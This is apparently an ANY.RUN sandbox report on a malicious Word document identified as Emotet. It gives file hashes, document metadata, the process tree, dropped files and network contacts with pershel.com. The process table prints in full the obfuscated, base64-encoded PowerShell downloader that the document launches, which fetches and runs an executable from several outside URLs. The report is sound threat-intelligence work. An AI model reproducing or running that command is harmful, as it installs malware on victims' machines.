download: | WGLmTGEibIfWDYA |
Full analysis: | https://app.any.run/tasks/746a6e81-d557-4790-b71b-9fd77795bac4 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 30, 2020, 14:41:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Numquam., Author: Nicolas Carre, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 30 14:54:00 2020, Last Saved Time/Date: Wed Sep 30 14:54:00 2020, Number of Pages: 1, Number of Words: 4097, Number of Characters: 23355, Security: 8 |
MD5: | A1FFE330121CA6D3D0E63895A28266AD |
SHA1: | C1B5648E55ECBA5F24F8C62F4CFF627CDAC5E0CC |
SHA256: | AA5F51ED04026AAD5AF58F4D5EF9AB31771B70FB02BD536162E5AE19F6E3531B |
SSDEEP: | 1536:cRD3bNqfNpu39IId5a6XP3Mg8afCqTN2tAgOd:cR1qf69xak3MgxC+N27Od |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Numquam. |
---|---|
Subject: | - |
Author: | Nicolas Carre |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:09:30 13:54:00 |
ModifyDate: | 2020:09:30 13:54:00 |
Pages: | 1 |
Words: | 4097 |
Characters: | 23355 |
Security: | Locked for annotations |
Company: | - |
Lines: | 194 |
Paragraphs: | 54 |
CharCountWithSpaces: | 27398 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1336 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\WGLmTGEibIfWDYA.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3400 | POwersheLL -ENCOD JABTAGgAagBnAHoAZABhAD0AKAAnAEwAegAnACsAKAAnAGoAJwArACcAMgBfAF8AOAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBTAGUAcgBQAFIATwBGAGkAbABlAFwAYgBzAGEAVABBAE0AaABcAHkAVABmAFcANwBuAGgAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBDAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAHUAUgBpAGAAVABgAFkAYABwAHIAbwB0AE8AYABjAE8AbAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAnACsAKAAnADEAMgAsACAAJwArACcAdABsAHMAMQAnACsAJwAxACwAIAAnACkAKwAnAHQAJwArACcAbABzACcAKQA7ACQATwBuADAAdABlAGkAbQAgAD0AIAAoACcAVwA5ACcAKwAoACcAbwBqACcAKwAnADIAbAAnACkAKwAnAHIAdwAnACkAOwAkAEMAcQB6AGYAZQB1AGgAPQAoACcAVwAnACsAKAAnADUAOAAwAGcAdAAnACsAJwAwACcAKQApADsAJABZAG4AbgBvAGkAbAAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAFEAJwArACgAJwA4AEUAJwArACcAQgAnACkAKwAnAHMAYQAnACsAKAAnAHQAYQBtAGgAUQAnACsAJwA4ACcAKQArACcARQBZACcAKwAnAHQAZgAnACsAKAAnAHcANwAnACsAJwBuAGgAUQA4AEUAJwApACkALgAiAHIAYABlAGAAcABMAEEAQwBFACIAKAAoAFsAYwBIAGEAcgBdADgAMQArAFsAYwBIAGEAcgBdADUANgArAFsAYwBIAGEAcgBdADYAOQApACwAWwBTAFQAUgBpAE4AZwBdAFsAYwBIAGEAcgBdADkAMgApACkAKwAkAE8AbgAwAHQAZQBpAG0AKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABSAGMAbABjAHIAawA5AD0AKAAnAFEAJwArACgAJwAxADkAMAAnACsAJwAwAG0AJwApACsAJwBvACcAKQA7ACQAVwB0AHoAaAB1AGMAcwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgB3AGUAYgBjAEwASQBlAE4AVAA7ACQAUgBnAGUANQBkADAAdAA9ACgAJwBoAHQAJwArACcAdABwACcAKwAoACcAOgAvACcAKwAnAC8AcABlACcAKQArACgAJwByAHMAaAAnACsAJwBlAGwAJwApACsAJwAuAGMAJwArACgAJwBvACcAKwAnAG0ALwAnACkAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAJwArACcAbwBuACcAKwAoACcAdAAnACsAJwBlAG4AdAAvACcAKQArACcAQQByACcAKwAnAHAAJwArACcALwAnACsAJwAqACcAKwAoACcAaAB0AHQAcAAnACsAJwA6ACcAKwAnAC8AJwApACsAJwAvAHYAJwArACcAaQAnACsAKAAnAGQAJwArACcAYQBkAG8AaABvACcAKQArACgAJwBtAGUAbQAnACsAJwAuACcAKQArACgAJwBjACcAKwAnAG8AJwArACcAbQAvAHcAcAAnACkAKwAoACcALQAnACsAJwBjAG8AbgAnACkAKwAnAHQAZQAnACsAJwBuAHQAJwArACcALwAnACsAKAAnAGkAJwArACcAZwBiACcAKQArACcALwAqACcAKwAnAGgAdAAnACsAKAAnAHQAcAA6ACcAKwAnAC8AJwApACsAKAAnAC8AZABlACcAKwAnAG0AJwApACsAJwBvADEAJwArACcANwAuACcAKwAoACcAdwAnACsAJwBlAGIAZAB1AG4AZwBzACcAKQArACcAYQAnACsAJwBuACcAKwAoACcALgAnACsAJwBjAG8AbQAnACkAKwAoACcALwB3AHAALQAnACsAJwBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuACcAKwAnAC8AQwBkAC8AKgAnACkAKwAoACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8AJwApACsAKAAnAC8AaQBnAC4AawAnACsAJwBhACcAKQArACgAJwBsAGMAJwArACcAYQAnACkAKwAnAHIAJwArACgAJwBlAC4AbwAnACsAJwBuAGwAJwApACsAKAAnAGkAbgAnACsAJwBlACcAKQArACcALwBhACcAKwAoACcAcABwAC8AOQAnACsAJwByACcAKQArACgAJwAyAC8AJwArACcAKgAnACkAKwAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKQArACgAJwAvAC8AJwArACcAYwBsACcAKQArACcAdQAnACsAJwBzAGQAJwArACgAJwBpACcAKwAnAHIAZQAnACkAKwAnAGMAJwArACgAJwB0ACcAKwAnAG8AcgAnACsAJwB5AC4AeAB5AHoALwAnACsAJwB3ACcAKQArACgAJwBwAC0AJwArACcAYQAnACkAKwAoACcAZABtAGkAJwArACcAbgAvAHMAMgAnACsAJwAvACoAaAB0AHQAcAAnACkAKwAnAHMAJwArACcAOgAvACcAKwAnAC8AJwArACgAJwBuAGEAaQBsAGQAZQBwAG8AJwArACcAdAAnACkAKwAoACcAZgAnACsAJwB3AGIALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBuACcAKwAnAGMAJwArACcAdwBzAC8AdgAvACcAKQArACgAJwAqAGgAJwArACcAdAB0AHAAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AJwArACcAcwBhACcAKwAnAG0AJwArACcAcwBwAG8AJwArACcAcgB0AGEAbAAuAG8AcgBnACcAKQArACgAJwAvAGkAbQAnACsAJwBhACcAKQArACgAJwBnAGUAcwAvACcAKwAnAEEAJwApACsAKAAnAGsAdwAnACsAJwAvACcAKQApAC4AIgBzAFAAYABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFIAYQB1AHkAbQBnAG0APQAoACcAQgB3ACcAKwAnAGQAJwArACgAJwBnAGEAdAAnACsAJwAxACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAVABpAGYAcQAyADMANQAgAGkAbgAgACQAUgBnAGUANQBkADAAdAApAHsAdAByAHkAewAkAFcAdAB6AGgAdQBjAHMALgAiAEQATwB3AGAATgBMAG8AYABBAGQAYABGAGkAbABFACIAKAAkAFQAaQBmAHEAMgAzADUALAAgACQAWQBuAG4AbwBpAGwAMQApADsAJABLADMAZABpAGcAdAAxAD0AKAAnAE4AYwAnACsAKAAnAHQAbwB4ACcAKwAnAGkAZwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAJwArACcAdABlAG0AJwApACAAJABZAG4AbgBvAGkAbAAxACkALgAiAGwAYABlAG4ARwB0AEgAIgAgAC0AZwBlACAAMwAxADEAMQAxACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAFkAbgBuAG8AaQBsADEAKQA7ACQARQBsAGYAMABsAGYAcgA9ACgAKAAnAEUAYQAnACsAJwA2AGgAMwB4ACcAKQArACcAZQAnACkAOwBiAHIAZQBhAGsAOwAkAE4AdQBoAGkAZgB1AGYAPQAoACcAVABlACcAKwAoACcAagB5ACcAKwAnADkAdAA0ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABOADIANQBpAHUAcQBkAD0AKAAoACcAUQAnACsAJwBzAF8AJwApACsAKAAnAHMANgB3ACcAKwAnADIAJwApACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3760 | "C:\Users\admin\Bsatamh\Ytfw7nh\W9oj2lrw.exe" | C:\Users\admin\Bsatamh\Ytfw7nh\W9oj2lrw.exe | POwersheLL.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3220 | "C:\Users\admin\AppData\Local\osbaseln\netplwiz.exe" | C:\Users\admin\AppData\Local\osbaseln\netplwiz.exe | — | W9oj2lrw.exe |
User: admin Integrity Level: MEDIUM Description: ZipTest MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA549.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3400 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BOW6DJQQ79SDMII7H2QA.temp | — | |
MD5:— | SHA256:— | |||
3400 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:F52BEDF97A9B01E99B69B5C83518523E | SHA256:68B50A1A9852D6200D98D905CEC4EBA6CEF2CBD5699A9F85ABDEA6FF7E780EAC | |||
1336 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:00B92B16F79EF6DD303E90865E112185 | SHA256:C418AC081B79908D2C573C29DF720BA6D8D50238760DEAB60DC57824201F6CC0 | |||
3760 | W9oj2lrw.exe | C:\Users\admin\AppData\Local\osbaseln\netplwiz.exe | executable | |
MD5:9F9EB5304ED124E54FC4FCDACB6C0CC8 | SHA256:038D44FBB377D4E08FE011BED23F6266B792E98F614B6E3F66834925E1AA3B86 | |||
1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$LmTGEibIfWDYA.doc | pgc | |
MD5:70A060AC959880094EE3A5E0AC388EB2 | SHA256:50F24E5625CE0203AFADB8A977AAD5D5E861AAAD44FE8F201DE84401E385E68C | |||
3400 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bb314.TMP | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
3400 | POwersheLL.exe | C:\Users\admin\Bsatamh\Ytfw7nh\W9oj2lrw.exe | executable | |
MD5:9F9EB5304ED124E54FC4FCDACB6C0CC8 | SHA256:038D44FBB377D4E08FE011BED23F6266B792E98F614B6E3F66834925E1AA3B86 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3400 | POwersheLL.exe | 104.18.62.212:443 | pershel.com | Cloudflare Inc | US | shared |
3400 | POwersheLL.exe | 104.18.62.212:80 | pershel.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pershel.com |
| malicious |